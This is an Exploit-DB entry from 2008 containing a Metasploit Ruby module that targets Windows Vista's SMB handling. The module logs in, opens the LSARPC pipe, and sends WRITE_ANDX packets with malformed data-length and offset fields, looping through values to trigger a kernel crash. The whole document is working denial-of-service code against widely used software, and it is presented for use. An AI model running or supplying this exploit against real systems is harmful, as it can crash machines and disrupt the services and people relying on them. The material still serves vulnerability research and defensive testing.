Microsoft Windows - 'WRITE_ANDX' SMB Command Handling Kernel Denial of Service (Metasploit)

EDB-ID:

6463




Platform:

Windows

Date:

2008-09-15


require 'msf/core'

module Msf
module Exploits
module Test


class BugTest < Msf::Exploit::Remote


	include Exploit::Remote::SMB


	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'test exploit',
			'Description'    => 	
				"tests",
			'Author'         => 'tests',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 0 $',
			'Arch'           => 'x86',
			'Payload'        =>
				{
					'Space' => 1000
				},
			'Targets'        => 
				[
					[
						'Windows VISTA',
						{
							'Platform' => 'win'
						}
					],
				],
			'DefaultTarget' => 0))
	end


	def subexploit(dlenlow, doffset,fillersize)

		print_line("1")

            datastore['SMBUser']='testuser'
            datastore['SMBPass']='testuser'
            datastore['SMBDomain']='COBAYA'
		datastore['SMBName']='COBAYA' 

		print_line("2")
		
		connect()

		print_line("3")

		smb_login()

		print_line("4")
 
               pkt = CONST::SMB_CREATE_PKT.make_struct

		pkt['Payload']['SMB'].v['Flags1'] = 0x18
		pkt['Payload']['SMB'].v['Flags2'] = 0xc807

		pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i
		pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i
		pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i
		pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i

		pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX

		pkt['Payload']['SMB'].v['WordCount'] = 24
		
		pkt['Payload'].v['AndX'] = 255
		pkt['Payload'].v['AndXOffset'] = 0xdede
		pkt['Payload'].v['FileNameLen'] = 14
		pkt['Payload'].v['CreateFlags'] = 0x16
		pkt['Payload'].v['AccessMask'] = 0x2019f  # Maximum Allowed
		pkt['Payload'].v['ShareAccess'] = 7
		pkt['Payload'].v['CreateOptions'] = 0x400040
		pkt['Payload'].v['Impersonation'] = 2       
		pkt['Payload'].v['Disposition'] = 1
		pkt['Payload'].v['Payload'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00"


		simple.client.smb_send(pkt.to_s)

		print_line("5")

		ack = simple.client.smb_recv_parse(CONST::SMB_COM_NT_CREATE_ANDX)
		
		pkt = CONST::SMB_WRITE_PKT.make_struct

		data_offset = pkt.to_s.length - 4

		print_line("6")
		
		filler = Rex::Text.rand_text(fillersize)

		print_line("7")

		pkt['Payload']['SMB'].v['Signature1']=0xcccccccc
		pkt['Payload']['SMB'].v['Signature2']=0xcccccccc
		pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i
		pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i
		pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i
		pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i
		pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_WRITE_ANDX
		pkt['Payload']['SMB'].v['Flags1'] = 0x18
		pkt['Payload']['SMB'].v['Flags2'] = 0xc807
		pkt['Payload']['SMB'].v['WordCount'] = 14
		pkt['Payload'].v['AndX'] = 255
		pkt['Payload'].v['AndXOffset'] = 0xdede
		pkt['Payload'].v['FileID'] = ack['Payload'].v['FileID']
		pkt['Payload'].v['Offset'] = 0
		pkt['Payload'].v['Reserved2'] = -1
		pkt['Payload'].v['WriteMode'] = 8
		pkt['Payload'].v['Remaining'] = fillersize
		pkt['Payload'].v['DataLenHigh'] = 0
		pkt['Payload'].v['DataLenLow'] = dlenlow #<==================
		pkt['Payload'].v['DataOffset'] = doffset #<====
		pkt['Payload'].v['DataOffsetHigh'] = 0xcccccccc #<====
		pkt['Payload'].v['ByteCount'] = fillersize#<====
		pkt['Payload'].v['Payload'] = filler

		print_line("8")
		
		simple.client.smb_send(pkt.to_s)
		
		print_line("9")

	end

	def exploit
		
		k=72
		j=0xffff
		while j>10000
			i=0xffff
			while i>10000
				begin
					print_line("datalenlow=#{i} dataoffset=#{j} fillersize=#{k}")
					subexploit(i,j,k)
				rescue
					print_line("rescue")
				end
				i=i-10000
			end
			j=j-10000
		end
		
	end

end

end
end
end

# milw0rm.com [2008-09-15]